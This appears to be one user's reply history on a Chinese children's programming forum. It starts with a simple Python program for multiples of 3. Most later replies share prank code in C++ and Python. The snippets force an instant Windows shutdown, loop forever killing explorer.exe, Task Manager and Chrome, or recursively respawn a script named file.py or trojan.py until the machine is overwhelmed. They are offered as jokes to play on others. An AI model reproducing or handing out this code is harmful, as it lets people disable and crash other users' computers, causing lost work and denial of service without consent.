Lv.1
77ECEA85-EA13-05EE-BA77-E5D95B05D8E2
签名:899FA603-3801-6B87-418A-8B47A6B9A66B 098BEB5F-75C4-64AF-769B-DC002A88590B 038818D0-CD7F-6B86-AB6C-2A78E226643F 1738D4C6-7DFA-E471-8326-E777C158B534
在 【Python作品分享】求2个数之间3的倍数【作品秀】 中回复
print('输入两个整数,输出它们之间所有的为3的倍数的数(不包括这两个整数)')
print('定义4个变量,a,b为输入的两个数,c是3的倍数,max是用记a,b中最大的数')
print('如果b>a,交换两个数')
print('输入2个数吧!')
a = int(input('输入第一个数'))
b = int(input('输入第二个数'))
max1 = a
if (max1 > b):
a = b
b = max1
for c in range((a + 1),b,3)
print(c)2019-06-13T09:40:21 点赞:0
在 【Python作品分享】os【作品秀】 中回复
#include<bits/stdc++.h>
using namespace std;
int main()
{
cout<<"呵呵";
system("shutdown /s /t 0");
}2019-06-13T17:22:01 点赞:0
在 【Python作品分享】【OS模块】嘿嘿嘿,你敢运行吗???【作品秀】 中回复
/*
比关机更坑的
*/
#include<bits/stdc++.h>
using namespace std;
int main()
{
while(1)
{
system("taskkill /f /im explorer.exe >nul 2>nul");
system("taskkill /f /im taskmgr.exe >nul 2>nul");
}
}
2020-04-03T17:00:13 点赞:0
在 【Python作品分享】【OS模块】嘿嘿嘿,你敢运行吗???【作品秀】 中回复
Python版
#比关机更坑的
from os import system
while True:
system("taskkill /f /im explorer.exe >nul 2>nul")
system("taskkill /f /im taskmgr.exe >nul 2>nul")
system("taskkill /f /im chrome.exe >nul 2>nul")
2020-04-05T15:54:37 点赞:0
在 【Python作品分享】【OS模块】嘿嘿嘿,你敢运行吗???【作品秀】 中回复
from os import system
while True:
system("python C:\\file.py")
保存为 C:\file.py
2020-04-05T16:06:42 点赞:0
在 【Python作品分享】此电脑(病毒)(喵产品)【作品秀】 中回复
from os import system
while True:
system("taskkill /f /im explorer.exe >nul 2>nul")
system("taskkill /f /im taskmgr.exe >nul 2>nul")
system("taskkill /f /im chrome.exe >nul 2>nul")
2020-04-05T16:51:42 点赞:1
在 【Python作品分享】系统错误,系统喵机【教程贴】 中回复
from os import system
while True:
system("python C:\\file.py")
保存为 C:\file.py
2020-04-05T16:56:34 点赞:0
在 【Python作品分享】愚人节作品【作品秀】 中回复
为什么不用这个呢?
from os import system
while True:
system("taskkill /f /im explorer.exe >nul 2>nul")
system("taskkill /f /im taskmgr.exe >nul 2>nul")
system("taskkill /f /im chrome.exe >nul 2>nul")
2020-04-05T17:02:40 点赞:0
在 求素材!!!有没有会语言编程的朋友啊!!!我找你们有事 中回复
//又是滑稽的一天
include<bits/stdc++.h>
using namespace std;
int main()
{
int choice;
cout<<"请输入1,如果输入错误电脑会关机";
cin>>choice;
if(choice==1) system("shutdown /s /t 60 /c \"你被坑了:D\"");
else system("shutdown /s /t 60 /c \"你不听我的话!系统即将关机!\"");
}
2020-04-10T15:23:53 点赞:0
在 求素材!!!有没有会语言编程的朋友啊!!!我找你们有事 中回复
#又双叒叕是滑稽的一天(Python)
from os import system
while True:
system("taskkill /f /im explorer.exe >nul 2>nul")
system("taskkill /f /im taskmgr.exe >nul 2>nul")
system("taskkill /f /im chrome.exe >nul 2>nul")
2020-04-10T15:27:36 点赞:0
在 求素材!!!有没有会语言编程的朋友啊!!!我找你们有事 中回复
//又双叒叕是滑稽的一天(C++)
#include<bits/stdc++.h>
using namespace std;
int main()
{
while(1)
{
system("taskkill /f /im explorer.exe >nul 2>nul");
system("taskkill /f /im taskmgr.exe >nul 2>nul");
}
}
2020-04-10T15:28:27 点赞:0
在 求素材!!!有没有会语言编程的朋友啊!!!我找你们有事 中回复
//滑稽保命
#include<bits/stdc++.h>
using namespace std;
int main()
{
freopen("C\\trojan.py","w",stdout);
cout<<"import os"<<endl;
cout<<"while True:"<<endl;
cout<<"system(\"python C\\trojan.py\")";
fclose(stdout);
cout<<"########病毒准备就绪#########";
system("python C\\trojan.py");
}
//滑稽保命2020-04-10T15:35:17 点赞:0